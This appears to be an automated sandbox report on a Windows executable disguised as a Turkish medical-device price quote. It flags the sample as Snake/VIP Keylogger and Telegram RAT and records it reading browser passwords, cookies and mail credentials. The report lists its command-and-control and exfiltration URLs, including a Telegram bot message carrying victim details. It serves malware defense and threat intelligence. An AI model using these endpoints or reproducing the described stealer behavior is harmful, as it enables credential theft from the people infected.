                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe.40fca58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe PID: 7608, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts112
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS1
                  Security Software Discovery                  		Distributed Component Object Model1
                  Clipboard Data                  		1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                  Process Injection                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569776 Sample: fiyati_teklif 65TIBBI20_ Me... Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 api.telegram.org 2->28 30 4 other IPs or domains 2->30 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 48 11 other signatures 2->48 8 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe 4 2->8         started        signatures3 44 Tries to detect the country of the analysis system (by using the IP) 26->44 46 Uses the Telegram API (likely for C&C communication) 28->46 process4 file5 24 fiyati_teklif 65TI...peg docx _ .exe.log, ASCII 8->24 dropped 50 Adds a directory exclusion to Windows Defender 8->50 52 Injects a PE file into a foreign processes 8->52 12 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        18 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe 8->18         started        20 fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe 8->20         started        signatures6 process7 dnsIp8 32 adendanismanlik.com.tr 77.245.159.14, 49802, 587 NIOBEBILISIMHIZMETLERITR Turkey 12->32 34 api.telegram.org 149.154.167.220, 443, 49781 TELEGRAMRU United Kingdom 12->34 36 2 other IPs or domains 12->36 54 Tries to steal Mail credentials (via file / registry access) 12->54 56 Tries to harvest and steal browser information (history, passwords, etc) 12->56 58 Loading BitLocker PowerShell Module 16->58 22 conhost.exe 16->22         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe34%ReversingLabs
                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe35%VirustotalBrowse
                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe100%AviraHEUR/AGEN.1307351
                  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://localhost/calculator_server/requests.php0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		172.67.177.134
                  		truefalse
                    		high
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high
                      adendanismanlik.com.tr
                      		77.245.159.14
                      		truetrue
                        		unknown
                        checkip.dyndns.com
                        		193.122.6.168
                        		truefalse
                          		high
                          checkip.dyndns.org
                          		unknown
                          		unknownfalse
                            		high
                            mail.adendanismanlik.com.tr
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2007/12/2024%20/%2009:28:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high
                                http://checkip.dyndns.org/false
                                  		high
                                  https://reallyfreegeoip.org/xml/8.46.123.228false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://aborters.duckdns.org:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://ac.ecosia.org/autocomplete?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.office.com/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://51.38.247.67:8081/_send_.php?Lfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/botfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://anotherarmy.dns.army:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://localhost/calculator_server/requests.phpfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://checkip.dyndns.org/qfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://chrome.google.com/webstore?hl=enfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325849803.0000000003087000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3763220342.0000000003B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://varders.kozow.com:8081fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedfiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.org/xml/fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1326634004.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757107438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            149.154.167.220
                                                                            		api.telegram.orgUnited Kingdom
                                                                            		62041TELEGRAMRUfalse
                                                                            77.245.159.14
                                                                            		adendanismanlik.com.trTurkey
                                                                            		42868NIOBEBILISIMHIZMETLERITRtrue
                                                                            193.122.6.168
                                                                            		checkip.dyndns.comUnited States
                                                                            		31898ORACLE-BMC-31898USfalse
                                                                            172.67.177.134
                                                                            		reallyfreegeoip.orgUnited States
                                                                            		13335CLOUDFLARENETUSfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1569776
                                                                            Start date and time:2024-12-06 09:56:54 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 8m 43s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:14
